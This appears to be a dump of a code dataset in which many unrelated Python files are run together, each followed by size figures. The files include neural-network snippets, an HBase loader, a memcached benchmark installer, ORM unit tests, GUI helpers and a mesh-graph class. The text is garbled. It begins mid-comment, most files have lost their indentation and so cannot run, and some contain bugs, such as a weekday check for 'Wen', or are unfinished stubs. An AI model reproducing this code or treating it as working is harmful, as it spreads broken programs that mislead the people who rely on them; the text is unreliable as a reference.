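# mcd_euclid is hypothetical): Euclid's algorithm needs O(log(min(a, b))) steps
# instead of scanning every candidate divisor.
def mcd_euclid(a, b):
    while b:
        a, b = b, a % b
    return a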
# assignment 4
#Jóvio L. Giacomolli
import numpy as np
# sigmoid function
def sigmoid(x):
return 1/(1 + np.exp(-x))
# MLP architecture
n_input = 3
n_hidden = 4
n_output = 2
# vector of input values (random)
x = np.array([1, 2, 3])
# hidden layer weights
weights_in_hidden = np.array([[0.2, 0.1, -0.9, 0.03],
[0.6, -0.8,0.9, 0.02],
[0.5, -0.6, 0.1, 0.01]])
# output layer weights
weights_hidden_out = np.array([[-0.18, 0.11],
[-0.09, 0.05],
[-0.04, 0.05],
[-0.02, 0.07]])
# forward pass through the network
# hidden layer
# compute the linear combination of inputs and synaptic weights
# hidden layer input
hidden_layer_in = np.dot(x, weights_in_hidden)
# hidden layer output
hidden_layer_out = sigmoid(hidden_layer_in)
# output layer
output_layer_in = np.dot(hidden_layer_out, weights_hidden_out)
# apply the activation function
output_layer_out = sigmoid(output_layer_in)
print('The network outputs are {}'.format(output_layer_out)) | 1,129 | 498 |
from thrift.transport import TSocket,TTransport
from thrift.protocol import TBinaryProtocol
from hbase import Hbase
from hbase.ttypes import ColumnDescriptor
from hbase.ttypes import Mutation
import csv
import os
import time
import logging
from tqdm import tqdm
# table: station, column: attr, row: date
def main():
socket = TSocket.TSocket('127.0.0.1',9090)
socket.setTimeout(5000)
transport = TTransport.TBufferedTransport(socket)
protocol = TBinaryProtocol.TBinaryProtocol(transport)
client = Hbase.Client(protocol)
socket.open()
table_list = client.getTableNames()
start = time.time()
logging.basicConfig(format='%(asctime)s | %(levelname)s | %(message)s',
level=logging.INFO, datefmt='%Y-%m-%d %H:%M:%S')
logging.info('Initiating task: Taiwan Air Quality!')
Attributes = ['AMB_TEMP','CO','NO','NO2','NOx','O3','PM10','PM2.5','RAINFALL','RAIN_COND','UVB',
'RH','SO2','WD_HR','WIND_DIREC','WIND_SPEED','WS_HR','CH4','NMHC','THC','PH_RAIN']
csvfiles = [filename for filename in os.listdir(os.getcwd()) if filename.endswith('.csv')]
logging.info(str(csvfiles))
InsertCounts = 0
for file in csvfiles:
with open(file, newline='') as f:
frames = csv.reader(f)
table_Name = ''
logging.info("Start reading {0}".format(file))
Column_Descriptors = []
ctr = 0
# length = sum(1 for row in frames)
#
# for frame in tqdm(frames, total=length):
for frame in tqdm(frames):
if ctr == 0:
ctr += 1
continue
elif ctr == 1:
ctr += 1
table_Name = str(str.encode(frame[1],'utf-8')).replace('\\',"")
table_Name = table_Name.replace("b","")
table_Name = table_Name.replace("'","")
if table_Name not in table_list:
for type in Attributes:
Column_Descriptors.append(ColumnDescriptor(name=type))
client.createTable(table_Name,Column_Descriptors)
logging.info('Build Table : {0}'.format(table_Name))
else:
logging.info('Table {0} already exist, no need to create'.format(table_Name))
# ['2018/01/02', 'iilan', 'NOx', '5.1', '4.4', '3.5', '2.1', '2.5', '3.2', '4.6', '15',
# '13', '11', '7', '6.8', '7.1', '13', '13', '12', '13', '16', '24', '23', '20', '24', '18', '13']
for i in range(3,26):
qualifier = i-2
value = frame[i]
row = frame[0] # date
column = frame[2] # attr
mutate = Mutation(column=column+':'+str(qualifier),value=value)
client.mutateRow(table_Name, frame[0], [mutate])
InsertCounts += 1
end = time.time()
logging.info("================Insert Done================\n")
logging.info("totalInsertCount: {0}, totalTimeSpend: {1}\n".format(InsertCounts,end-start))
logging.info(client.getTableNames())
if __name__ == '__main__':
main() | 3,273 | 1,064 |
"""Create PKCS11 Key."""
import pkcs11
from pkcs11.util.ec import encode_named_curve_parameters
if __name__ == "__main__":
lib = pkcs11.lib("/usr/lib/softhsm/libsofthsm2.so")
token = lib.get_token(token_label="token")
with token.open(rw=True, user_pin="1234") as session:
session.generate_keypair(
pkcs11.KeyType.RSA, 2048, label="small_rsa_key", store=True
)
session.generate_keypair(
pkcs11.KeyType.RSA, 4096, label="big_rsa_key", store=True
)
session.generate_keypair(pkcs11.KeyType.DSA, 2048, label="dsa_key", store=True)
ecparams = session.create_domain_parameters(
pkcs11.KeyType.EC,
{pkcs11.Attribute.EC_PARAMS: encode_named_curve_parameters("secp256r1")},
local=True,
)
ecparams.generate_keypair(store=True, label="ec_key")
| 873 | 341 |
class PyAsiceError(Exception):
"""
A generic exception that can happen while dealing with ASic-E/BDoc 2 files/signatures
"""
pass
class ContainerError(PyAsiceError):
pass
class NoFilesToSign(PyAsiceError):
pass
class SignatureVerificationError(PyAsiceError):
pass
class InvalidSignatureAlgorithm(SignatureVerificationError):
pass
| 371 | 113 |
from keras import backend as K
from keras.objectives import categorical_crossentropy
import tensorflow as tf
lambda_rpn_regr=1.0
lambda_rpn_class=1.0
lambda_cls_regr=1.0
lambda_cls_class=1.0
epsilon=1e-4
def rpn_loss_regr(num_anchors):
def rpn_loss_regr_fixed_num(y_true,y_pred):
x=y_true[:,:,:,4*num_anchors:]-y_pred
x_abs=K.abs(x)
x_bool=K.cast(K.less_equal(x_abs,1.0),tf.float32)
return lambda_rpn_regr * K.sum(
y_true[:, :, :, :4 * num_anchors] * (x_bool * (0.5 * x * x) + (1 - x_bool) * (x_abs - 0.5))) / K.sum(
epsilon + y_true[:, :, :, :4 * num_anchors])
return rpn_loss_regr_fixed_num
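# rpn_loss_regr above is the smooth-L1 (Huber-style) loss used for RPN box
# regression, masked so that only positive anchors contribute:
#   smooth_L1(x) = 0.5 * x**2    if |x| <= 1
#                = |x| - 0.5     otherwise
# which is exactly what the x_bool switch computes.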
def rpn_loss_cls(num_anchors):
def rpn_loss_cls_fixed_num(y_true, y_pred):
if K.image_dim_ordering() == 'tf':
return lambda_rpn_class * K.sum(y_true[:, :, :, :num_anchors] * K.binary_crossentropy(y_pred[:, :, :, :],
y_true[:, :, :,
num_anchors:])) / K.sum(
epsilon + y_true[:, :, :, :num_anchors])
else:
return lambda_rpn_class * K.sum(y_true[:, :num_anchors, :, :] * K.binary_crossentropy(y_pred[:, :, :, :],
y_true[:,
num_anchors:, :,
:])) / K.sum(
epsilon + y_true[:, :num_anchors, :, :])
return rpn_loss_cls_fixed_num
def class_loss_regr(num_classes):
def class_loss_regr_fixed_num(y_true, y_pred):
x = y_true[:, :, 4 * num_classes:] - y_pred
x_abs = K.abs(x)
x_bool = K.cast(K.less_equal(x_abs, 1.0), 'float32')
return lambda_cls_regr * K.sum(
y_true[:, :, :4 * num_classes] * (x_bool * (0.5 * x * x) + (1 - x_bool) * (x_abs - 0.5))) / K.sum(
epsilon + y_true[:, :, :4 * num_classes])
return class_loss_regr_fixed_num
def class_loss_cls(y_true, y_pred):
return lambda_cls_class * K.mean(categorical_crossentropy(y_true[0, :, :], y_pred[0, :, :]))
| 2,353 | 842 |
import os
import chainer
import matplotlib.gridspec as gridspec
import matplotlib.pyplot as plt
from chainer import Variable,cuda
import numpy as np
import chainer.functions as F
import losses
from chainer.training import extensions
import warnings
# assume [-1, 1] input, rescaled to [0, 1]
def postprocess(var):
img = var.data.get()
img = (img + 1.0) / 2.0 # [0, 1)
img = img.transpose(0, 2, 3, 1)
return img
class VisEvaluator(extensions.Evaluator):
name = "myval"
def __init__(self, *args, **kwargs):
params = kwargs.pop('params')
super(VisEvaluator, self).__init__(*args, **kwargs)
self.vis_out = params['vis_out']
self.slice = params['slice']
if self.slice:
self.num_s = len(self.slice)
else:
self.num_s = 1
self.count = 0
warnings.filterwarnings("ignore", category=UserWarning)
def evaluate(self):
batch_x = self._iterators['testA'].next()
batch_y = self._iterators['testB'].next()
models = self._targets
if self.eval_hook:
self.eval_hook(self)
fig = plt.figure(figsize=(9, 3 * self.num_s*(len(batch_x)+ len(batch_y))))
gs = gridspec.GridSpec( self.num_s*(len(batch_x)+ len(batch_y)), 3, wspace=0.1, hspace=0.1)
x = Variable(self.converter(batch_x, self.device))
y = Variable(self.converter(batch_y, self.device))
with chainer.using_config('train', False):
with chainer.function.no_backprop_mode():
if len(models)>2:
x_y = models['dec_y'](models['enc_x'](x))
#x_y_x = models['dec_x'](models['enc_x'](x)) ## X => Z => X
x_y_x = models['dec_x'](models['enc_y'](x_y)) ## X => Y => X
else:
x_y = models['gen_g'](x)
x_y_x = models['gen_f'](x_y)
# for i, var in enumerate([x, x_y]):
for i, var in enumerate([x, x_y, x_y_x]):
imgs = postprocess(var).astype(np.float32)
for j in range(len(imgs)):
if self.slice != None:
for k in self.slice:
ax = fig.add_subplot(gs[j*len(self.slice)+k,i])
ax.imshow(imgs[j,:,:,k], interpolation='none',cmap='gray',vmin=0,vmax=1)
ax.set_xticks([])
ax.set_yticks([])
else:
ax = fig.add_subplot(gs[j,i])
ax.imshow(imgs[j], interpolation='none',vmin=0,vmax=1)
ax.set_xticks([])
ax.set_yticks([])
with chainer.using_config('train', False):
with chainer.function.no_backprop_mode():
if len(models)>2:
y_x = models['dec_x'](models['enc_y'](y))
#y_x_y = models['dec_y'](models['enc_y'](y)) ## Y => Z => Y
y_x_y = models['dec_y'](models['enc_x'](y_x)) ## Y => X => Y
else: # (gen_g, gen_f)
y_x = models['gen_f'](y)
y_x_y = models['gen_g'](y_x)
# for i, var in enumerate([y, y_y]):
for i, var in enumerate([y, y_x, y_x_y]):
imgs = postprocess(var).astype(np.float32)
for j in range(len(imgs)):
if self.slice != None:
for k in self.slice:
ax = fig.add_subplot(gs[(j+len(batch_x))*len(self.slice)+k,i])
ax.imshow(imgs[j,:,:,k], interpolation='none',cmap='gray',vmin=0,vmax=1)
ax.set_xticks([])
ax.set_yticks([])
else:
ax = fig.add_subplot(gs[j+len(batch_x),i])
ax.imshow(imgs[j], interpolation='none',vmin=0,vmax=1)
ax.set_xticks([])
ax.set_yticks([])
gs.tight_layout(fig)
plt.savefig(os.path.join(self.vis_out,'count{:0>4}.jpg'.format(self.count)), dpi=200)
self.count += 1
plt.close()
cycle_y_l1 = F.mean_absolute_error(y,y_x_y)
# cycle_y_l2 = F.mean_squared_error(y,y_x_y)
cycle_x_l1 = F.mean_absolute_error(x,x_y_x)
# id_xy_grad = losses.loss_grad(x,x_y)
result = {"myval/cycle_y_l1":cycle_y_l1, "myval/cycle_x_l1":cycle_x_l1}
return result
## obsolete
def visualize(models,test_image_folder, test_A_iter, test_B_iter):
@chainer.training.make_extension()
def visualization(trainer):
updater = trainer.updater
return visualization
| 4,597 | 1,613 |
VERSION = "2.50.0"
| 19 | 14 |
import argparse
import os.path
import functools
import numpy as np
from pyspark.mllib.linalg import SparseVector
from pyspark import SparkContext, SparkConf
import text_helpers
#TODO: implement
def getHashFunctions(n=200):
""" generates n number of hash functions
"""
pass
#TODO: implement
def getStopWords():
""" returns a list of stop words
"""
#TODO: use NLTK to get a list of stopwords
pass
#TODO: implement
def minHash(text, hash):
""" Returns min hash value of all hashes for a given text
Args:
data (RDD)
hash (function)
Returns:
int: min hash value for entire data set
"""
pass
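# An illustrative way the stubs above could be filled in (a sketch assuming the
# texts are shingled into n-gram strings; the *_sketch names are hypothetical and
# not part of the assignment skeleton):
import random

def getHashFunctions_sketch(n=200, prime=4294967311):
    """Return n pseudo-random universal hash functions h(x) = (a*hash(x) + b) % prime."""
    rng = random.Random(0)
    coeffs = [(rng.randrange(1, prime), rng.randrange(0, prime)) for _ in range(n)]
    return [lambda x, a=a, b=b: (a * hash(x) + b) % prime for a, b in coeffs]

def minHash_sketch(ngrams, hash_fn):
    """Return the minimum hash value of one hash function over a collection of n-grams."""
    return min(hash_fn(g) for g in ngrams)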
def run(fileName, n_hashes, n_buckets):
""" Starts the main LSH process.
Args:
fileName (string): path of text file to read
n_hashes (int): number of hash functions to generate
n_buckets (int): number of buckets to use
Returns:
Vector: buckets of minhash values
"""
sc = SparkContext(conf = SparkConf())
hashes = sc.broadcast(getHashFunctions(n_hashes))
text = sc.textFile(fileName)
stopWords = sc.textFile('path/to/stopwords') # Test
cleanData = text.map(removePunctuation).subtract(stopWords).cache()
#TODO: convert to n-grams
#TODO: get min-hash values -> total of n_hashes runs. Implement using a
# partial function from functools
#TODO: return a vector representing buckets of minhash values
if __name__ == "__main__":
parser = argparse.ArgumentParser(description = 'Spark LSH',
epilog = 'LSH', add_help = 'How to use',
prog = 'python spark-driver.py <arguments>')
parser.add_argument("-i", "--input", required = True,
help = "Input directory of text files.")
# Optional parameters.
parser.add_argument("-h", "--hashes", type = int, default = 200,
help = "Number of hash functions to use. [DEFAULT: 200]")
parser.add_argument("-b", "--buckets", type = int, default = 1000,
help = "Number of buckets to use. [DEFAULT: 1000]")
args = vars(parser.parse_args())
n_hashes,n_buckets = args['hashes'], args['buckets']
baseDir = os.path.join(args['input'])
inputPath = os.path.join('<path/to/document>') # Test
fileName = os.path.join(baseDir, inputPath)
run(fileName, n_hashes, n_buckets)
| 2,336 | 760 |
# Copyright 2016 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing memcached server installation and cleanup functions."""
import logging
from perfkitbenchmarker import errors
from perfkitbenchmarker import flags
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.linux_packages import INSTALL_DIR
FLAGS = flags.FLAGS
DOWNLOAD_URL = 'http://memcached.org/files/memcached-1.4.33.tar.gz'
MEMCACHED_DIR_NAME = 'memcached'
MEMCACHED_DIR = '%s/%s' % (INSTALL_DIR, MEMCACHED_DIR_NAME)
MEMCACHED_PORT = 11211
flags.DEFINE_integer('memcached_size_mb', 64,
'Size of memcached cache in megabytes.')
def _Install(vm):
"""Installs the memcached server on the VM."""
vm.Install('build_tools')
vm.Install('event')
vm.RemoteCommand('cd {0} && wget {1} -O memcached.tar.gz'.format(
INSTALL_DIR, DOWNLOAD_URL))
out, _ = vm.RemoteCommand('cd %s && tar -xzvf memcached.tar.gz' % INSTALL_DIR)
# The directory name should be the first line of stdout
memcached_dir = out.split('\n', 1)[0]
# Rename the directory to a standard name
vm.RemoteCommand('cd {0} && mv {1} {2}'.format(
INSTALL_DIR, memcached_dir, MEMCACHED_DIR_NAME))
# Make memcached
vm.RemoteCommand('cd {0} && ./configure && make'.format(MEMCACHED_DIR))
def YumInstall(vm):
"""Installs the memcache package on the VM."""
_Install(vm)
def AptInstall(vm):
"""Installs the memcache package on the VM."""
_Install(vm)
@vm_util.Retry(poll_interval=5, timeout=300,
retryable_exceptions=(errors.Resource.RetryableCreationError))
def _WaitForServerUp(server):
"""Block until the memcached server is up and responsive.
Will timeout after 5 minutes, and raise an exception. Before the timeout
expires any exceptions are caught and the status check is retried.
We check the status of the server by issuing a 'stats' command. This should
return many lines of form 'STAT <name> <value>\\r\\n' if the server is up and
running.
Args:
server: VirtualMachine memcached has been installed on.
Raises:
errors.Resource.RetryableCreationError when response is not as expected or
if there is an error connecting to the port or otherwise running the
remote check command.
"""
address = server.internal_ip
port = MEMCACHED_PORT
logging.info("Trying to connect to memcached at %s:%s", address, port)
try:
out, _ = server.RemoteCommand(
'(echo -e "stats\n" ; sleep 1)| netcat %s %s' % (address, port))
if out.startswith('STAT '):
logging.info("memcached server stats received. Server up and running.")
return
except errors.VirtualMachine.RemoteCommandError as e:
raise errors.Resource.RetryableCreationError(
"memcached server not up yet: %s." % str(e))
else:
raise errors.Resource.RetryableCreationError(
"memcached server not up yet. Expected 'STAT' but got '%s'." % out)
def ConfigureAndStart(server):
"""Prepare the memcached server on a VM.
Args:
server: VirtualMachine to install and start memcached on.
"""
server.Install('memcached_server')
for scratch_disk in server.scratch_disks:
server.RemoteCommand('sudo umount %s' % scratch_disk.mount_point)
server.RemoteCommand('cd {mcdir}; ./memcached -m {size} '
'&> /dev/null &'.format(
mcdir=MEMCACHED_DIR, size=FLAGS.memcached_size_mb))
_WaitForServerUp(server)
logging.info("memcached server configured and started.")
def StopMemcached(server):
out, _ = server.RemoteCommand(
'(echo -e "quit\n" ; sleep 1)| netcat %s %s' %
(server.internal_ip, MEMCACHED_PORT))
def FlushMemcachedServer(ip, port):
vm_util.IssueCommand(
'(echo -e "flush_all\n" ; sleep 1)| netcat %s %s' % (ip, port))
def Uninstall(vm):
vm.RemoteCommand('pkill memcached')
vm.RemoteCommand('rm -rf %s' % MEMCACHED_DIR)
| 4,469 | 1,492 |
# Testing our tests!!
from asyncpgsa.testing import MockPG
async def test_use_fetchrow():
pg = MockPG()
pg.set_database_results({'sqrt': 3})
result = await pg.fetchrow('SELECT * FROM sqrt(16);')
assert result['sqrt'] == 3
async def test_use_fetchval():
pg = MockPG()
pg.set_database_results(3)
result = await pg.fetchval('SELECT * FROM sqrt(16);')
assert result == 3
async def test_use_fetch():
pg = MockPG()
pg.set_database_results([{'sqrt': 3}])
result = await pg.fetch('SELECT * FROM sqrt(16);')
assert result[0]['sqrt'] == 3
| 582 | 207 |
import NORM
import NORM.utils
import psycopg2
import unittest
import logging
logging.basicConfig(level = logging.WARN)
class Person(NORM.DBObject):
TABLE = 'people'
FIELDS = ['firstname','surname','age']
class FakeCursor(object):
def __init__(self, conn):
self.conn = conn
def execute(self, sql, args = []):
logging.info("%s: %s", sql, args)
self.conn.append(sql, args)
self.sql = sql
self.args = args
def fetchone(self):
if self.sql.lower().startswith('select'):
if len(self.args) == 0 or self.args[0] == 1:
return {'firstname': 'joe','surname':'bloggs','age':27,'id':1}
else:
return {'firstname': 'jason','surname':'connery','age':52,'id':2}
elif self.sql.lower().startswith('insert'):
return {'newid': 2}
def __iter__(self):
yield self.fetchone()
def close(self):
pass
class FakeConnection(object):
def __init__(self):
self.statements = []
def cursor(self, cursor_factory = None):
return FakeCursor(self)
def append(self, sql, args):
self.statements.append( (sql, args) )
class NormTest(unittest.TestCase):
def setUp(self):
self.conn = FakeConnection()
#self.conn = psycopg2.connect('dbname=normtest')
def testDelete(self):
person = Person(self.conn, 2)
person.delete()
self.assertEquals(
self.conn.statements[-1],
('delete from people where id = %s', [2])
)
def testLoad(self):
person = Person(self.conn, 1)
self.assertEquals(person['firstname'], 'joe')
self.assertEquals(person['surname'], 'bloggs')
self.assertEquals(person['age'], 27)
self.assertEquals(person['id'], 1)
if hasattr(self.conn, 'statements'):
self.assertEquals(
self.conn.statements[-1],
('select * from people where id = %s', [1])
)
def testLimit(self):
people = Person.select_all(self.conn, _limit = 10)
self.assertIn(' LIMIT 10', self.conn.statements[-1][0])
person = Person.select_all(self.conn, _limit = (10, 10))
self.assertIn(' LIMIT 10 OFFSET 10', self.conn.statements[-1][0])
def testSelect(self):
people = Person.select_all(self.conn)
self.assertEquals(len(people), 1)
if hasattr(self.conn, 'statements'):
self.assertEquals(
self.conn.statements[-1],
('select * from people', [])
)
def testUpdate(self):
person = Person(self.conn, 1)
person['age'] = 28
person.store()
if hasattr(self.conn, 'statements'):
sql, args = self.conn.statements[-1]
self.assertIn('age = %(age)s', sql)
self.assertIn('firstname = %(firstname)s', sql)
self.assertIn('surname = %(surname)s', sql)
self.assertEquals(args,
{'firstname': 'joe','surname':'bloggs','age':28,'id':1}
)
def testCreate(self):
person = Person(self.conn)
person.update({
'firstname': 'jason',
'surname':'connery',
'age':52,
})
person.store()
if hasattr(self.conn, 'statements'):
sql, args = self.conn.statements[-1]
self.assertRegexpMatches(sql, '^insert into people')
self.assertIn('age', sql)
self.assertIn('firstname', sql)
self.assertIn('surname', sql)
self.assertIn('%(age)s', sql)
self.assertIn('%(firstname)s', sql)
self.assertIn('%(surname)s', sql)
self.assertIn('returning id as newid', sql)
self.assertEquals(args, {
'firstname': 'jason',
'surname': 'connery',
'age': 52,
'id': None,
})
self.assertEquals(person['id'], 2)
class UtilsTest(unittest.TestCase):
def testEncodeWhere(self):
wherestr, args = NORM.utils.encode_where({'age': 20})
self.assertEquals(wherestr, 'age = %(age)s')
self.assertIn('age', args)
self.assertEquals(args['age'], 20)
def testEncodeWhereCmp(self):
wherestr, args = NORM.utils.encode_where({'age' : ('>', 20)})
self.assertEquals(wherestr, 'age > %(age)s')
self.assertIn( 'age',args)
self.assertEquals(args['age'], 20)
unittest.main()
| 3,784 | 1,596 |
import os
import torch
import numpy as np
import torchvision.utils as vutils
from tensorboardX import SummaryWriter
from datetime import datetime
from utils.helpers import get_learning_rate
class TensorboardLogger:
def __init__(self, log_every=10, log_params=False, log_dir=None, log_images=False, log_grads=False, **kwargs):
current_time = datetime.now().strftime('%b%d_%H-%M-%S')
self.log_dir = os.path.join(log_dir, "runs", current_time)
self.writer = SummaryWriter(log_dir=self.log_dir)
self.counters = {"evaluate": 0, "train": 0, "test": 0}
self.epochs = {"evaluate": 0, "train": 0, "test": 0}
self.log_every = log_every
self.log_params = log_params if isinstance(log_params, bool) else False
self.log_images = log_images if isinstance(log_images, bool) else False
self.log_grads = log_grads if isinstance(log_grads, bool) else False
print(f"Logger: Log parameters={log_params}, Log gradients={log_grads}")
# def state_dict(self):
# state = {}
# state['counters'] = self.counters
# state['epochs'] = self.epochs
# return {'state': state}
def fast_forward(self, last_epoch=0, step_per_epoch=0):
step = (last_epoch+1)*step_per_epoch
self.counters = {"evaluate": step, "train": step, "test": step}
self.epochs = {"evaluate": last_epoch+1, "train": last_epoch+1, "test": last_epoch+1}
def teardown(self):
self.writer.export_scalars_to_json(os.path.join(self.log_dir, "all_scalars.json"))
self.writer.close()
def add_embedding(self, features, images, phase="train", stage="epoch"):
step = self.epochs[phase] if stage == "epoch" else self.counters[phase]
self.writer.add_embedding(features, label_img=images, global_step=step)
def _plot_metrics(self, metrics, phase, step):
for m_name, m_val in metrics.items():
self.writer.add_scalar("{}/{}".format(phase, m_name), m_val, step)
def log_gradients(self, tag, model, phase="train", log_every=1000):
if (self.log_grads is True) and (self.counters[phase] % log_every == 0):
for name, param in model.named_parameters():
if param.grad is not None:
self.writer.add_histogram("{}_{}".format(tag, name), param.grad.data.cpu().numpy(), self.counters[phase])
def log_preactivations(self, module, phase="train"):
classname = module.__class__.__name__
def _log_preactivations(input, output):
self.writer.add_histogram("{}_{}".format(classname, "forward"), output.data.cpu().numpy(), self.counters[phase])
if classname.find('Conv') != -1 or classname.find('Linear') != -1:
module.register_forward_hook(_log_preactivations)
def log_image_grid(self, name, images, phase="train", normalize=True):
if self.log_images is True:
x_rg = vutils.make_grid(images, normalize=normalize, scale_each=True)
self.writer.add_image(name, x_rg, self.counters[phase])
# Method Missing - automatically assume it is for the summaryWriter
def __getattr__(self, method_name):
log_fn = getattr(self.writer, method_name, None)
if log_fn:
return log_fn
else:
raise AttributeError(method_name)
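# Illustrative usage (argument values are hypothetical): any method not defined
# on TensorboardLogger is forwarded to the underlying SummaryWriter by
# __getattr__ above, e.g.
#   logger = TensorboardLogger(log_every=10, log_dir="./example_logs")
#   logger.add_scalar("debug/value", 0.5, 0)   # resolved on self.writer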
def log_iteration(self, engine, phase="train", models=None, optims=None):
# other_metrics = {}
if optims:
for name, optim in optims.items():
lr = get_learning_rate(optim)[0]
self.writer.add_scalar("{}/{}_lr".format(phase, name), lr, self.counters[phase])
if self.counters[phase] % self.log_every == 0:
self._plot_metrics(engine.state.metrics, phase, self.counters[phase])
# self._plot_metrics(other_metrics, phase, self.counters[phase])
self.counters[phase] += 1
def log_epoch(self, engine, phase="train", models=None, optims=None):
self._plot_metrics(engine.state.metrics, phase, self.counters[phase])
if phase == "train" and self.log_params is True:
for m_name, model in models.items():
for name, param in model.named_parameters():
self.writer.add_histogram("{}_{}".format(m_name, name), param.data.cpu().numpy(), self.epochs[phase])
if phase == "evaluate":
self.epochs[phase] += 1
else:
self.epochs[phase] = engine.state.epoch | 4,012 | 1,567 |
# WRITE YOUR CODE SOLUTION HERE
from datetime import datetime, timedelta, date
# Get today's date and store it in the variable 'date'
date = datetime.now()
"""
Use today's date to get the name of the day of the week written in short
form with the first letter capitalized (e.g. 'Fri' if today were Friday) and
assign it to the variable 'day'.
"""
day = datetime.date(date).strftime('%a')
"""
Uses an if statement to determine today's fare following this bus fare schedule:
Monday - Friday --> 100
Saturday --> 60
Sunday --> 80
Prints the results in this exact format
Date: 2021-01-05
Day:Tue
Fare:100
"""
if day == "Mon" or day == "Tue" or day == "Wen" or day =="Thu" or day == "Fri":
fare = 100
elif day == "Sat":
fare = 60
else:
fare = 80
print("Date:", date.date())
print("Day:" + day)
print("Fare:", fare)
| 870 | 325 |
from django.db.models.base import Model
from django.forms import ModelForm, widgets
from django import forms
from login.models import User, Task, Submissions, Subject
class DateTimeInput(forms.DateTimeInput):
input_type = 'datetime-local'
input_value = ""
class AddTaskForm(ModelForm):
class Meta:
model = Task
fields = ['Name', 'Description', 'deadline']
widgets = {
'deadline' : DateTimeInput(),
}
class GraderForm(ModelForm):
class Meta:
model = Submissions
fields = ['comment', 'nilai'] | 572 | 163 |
import PySimpleGUI as sg
def webexPollBuilderGUI(t):
return sg.Window("Webex Poll Builder").Layout(
[[sg.Text("How long should the question last for?"),
sg.Combo(t)],
[sg.Text("Select the file with the question and answers.")],
[sg.In(), sg.FileBrowse()],
[sg.Text("Select the directory to save output file to.")],
[sg.In(), sg.FolderBrowse()],
[sg.Text("Enter filename. (Default is date)")],
[sg.In()],
[sg.CloseButton("OK"), sg.CloseButton("Cancel")]]
).Read()
def timeNotSelected():
sg.popup("Please select a time from the drop-down menu.",
title="Time Not Selected")
def invalidTime(t):
sg.popup("Invalid time: " + str(t),
"Please select a time from the drop-down menu.",
title="Invalid Time")
def inFileNotSelected():
sg.popup("Please select a valid input (.txt) file.",
title="Input File Not Selected")
def invalidInFile(f):
sg.popup("Invalid input file: {0}".format(f),
"Please select a valid input (.txt) file.",
title="Invalid Input File")
def outDirNotSelected():
sg.popup("Please select a valid output directory.",
title="Output Directory Not Selected")
def invalidOutDir(d):
sg.popup("Invalid Output Directory: {0}".format(d),
"Please select a valid output directory.",
title="Invalid Output Directory")
def invalidOutFilename(f):
sg.popup("Invalid Output Filename: {0}".format(f),
"Please enter a valid file name (or leave the field blank).",
title="Invalid Output Filename")
def noCorrectAnswer():
sg.popup("There must be at least one correct answer.",
title="No Correct Answer(s)")
def invalidFileFormat(e, g):
sg.popup("".join(["Expected ", e, ", got ", g, "."]),
title="Invalid File Format")
def invalidAnswerFormat(s):
invalidFileFormat("'T' or 'F' at beginning of answer", "'" + s + "'")
def noQuestion():
invalidFileFormat("question", "a blank line")
def noBlankLineAfterQuestion(s):
invalidFileFormat("a blank line after question", "'" + s + "'")
| 2,200 | 658 |
import numpy as np
import networkx as nx
from copy import deepcopy
from spira.core.parameters.variables import GraphParameter, StringParameter
from spira.core.parameters.descriptor import Parameter, RestrictedParameter
from spira.yevon.geometry.coord import Coord
from spira.yevon.vmodel.geometry import GeometryParameter
from spira.yevon.geometry.ports.base import __Port__
from spira.core.parameters.restrictions import RestrictType
from spira.yevon.process import get_rule_deck
RDD = get_rule_deck()
__all__ = ['Net', 'NetParameter']
ELM_TYPE = {1: 'line', 2: 'triangle'}
from spira.core.transformable import Transformable
from spira.core.parameters.initializer import ParameterInitializer
class __Net__(Transformable, ParameterInitializer):
""" """
@property
def count(self):
return nx.number_of_nodes(self.g)
class Net(__Net__):
"""
Constructs a graph from the physical geometry
generated from the list of elements.
"""
# g = GraphParameter()
g = Parameter()
mesh_data = Parameter(fdef_name='create_mesh_data')
geometry = GeometryParameter(allow_none=True, default=None)
branch_nodes = Parameter(fdef_name='create_branch_nodes')
lines = Parameter(fdef_name='create_lines')
triangles = Parameter(fdef_name='create_triangles')
physical_triangles = Parameter(fdef_name='create_physical_triangles')
physical_lines = Parameter(fdef_name='create_physical_lines')
name = StringParameter(default='no_name')
def __init__(self, **kwargs):
super().__init__(**kwargs)
if 'g' in kwargs:
self.g = kwargs['g']
else:
self.g = nx.Graph()
self._generate_mesh_graph()
def __repr__(self):
if self.geometry is None:
class_string = "[SPiRA: Net] (name \'{}\', nodes {})"
return class_string.format(self.name, self.count)
else:
class_string = "[SPiRA: Net] (name \'{}\', nodes {}, geometry {})"
return class_string.format(self.name, self.count, self.geometry.process.symbol)
def __str__(self):
return self.__repr__()
def _generate_mesh_graph(self):
""" Create a graph from the meshed geometry. """
ll = len(self.mesh_data.points)
A = np.zeros((ll, ll), dtype=np.int64)
for n, triangle in enumerate(self.triangles):
self._add_edges(n, triangle, A)
for n, triangle in enumerate(self.triangles):
self._add_positions(n, triangle)
def _add_edges(self, n, tri, A):
def update_adj(self, t1, adj_mat, v_pair):
if (adj_mat[v_pair[0]][v_pair[1]] != 0):
t2 = adj_mat[v_pair[0]][v_pair[1]] - 1
self.g.add_edge(t1, t2, label=None)
else:
adj_mat[v_pair[0]][v_pair[1]] = t1 + 1
adj_mat[v_pair[1]][v_pair[0]] = t1 + 1
v1 = [tri[0], tri[1], tri[2]]
v2 = [tri[1], tri[2], tri[0]]
for v_pair in list(zip(v1, v2)):
update_adj(self, n, A, v_pair)
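# _add_edges above connects two mesh triangles in the graph when they share an
# edge: for each of a triangle's three vertex pairs, the adjacency matrix A
# records the first triangle seen; when a second triangle touches the same
# vertex pair, an edge is added between the two triangle nodes.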
def _add_positions(self, n, triangle):
from spira import settings
pp = self.mesh_data.points
grids_per_unit = settings.get_grids_per_unit()
n1, n2, n3 = pp[triangle[0]], pp[triangle[1]], pp[triangle[2]]
x = (n1[0] + n2[0] + n3[0]) / 3
y = (n1[1] + n2[1] + n3[1]) / 3
x = x * grids_per_unit
y = y * grids_per_unit
self.g.node[n]['vertex'] = triangle
self.g.node[n]['position'] = Coord(x, y)
self.g.node[n]['display'] = RDD.DISPLAY.STYLE_SET[RDD.PLAYER.METAL]
def create_mesh_data(self):
return self.geometry.mesh_data
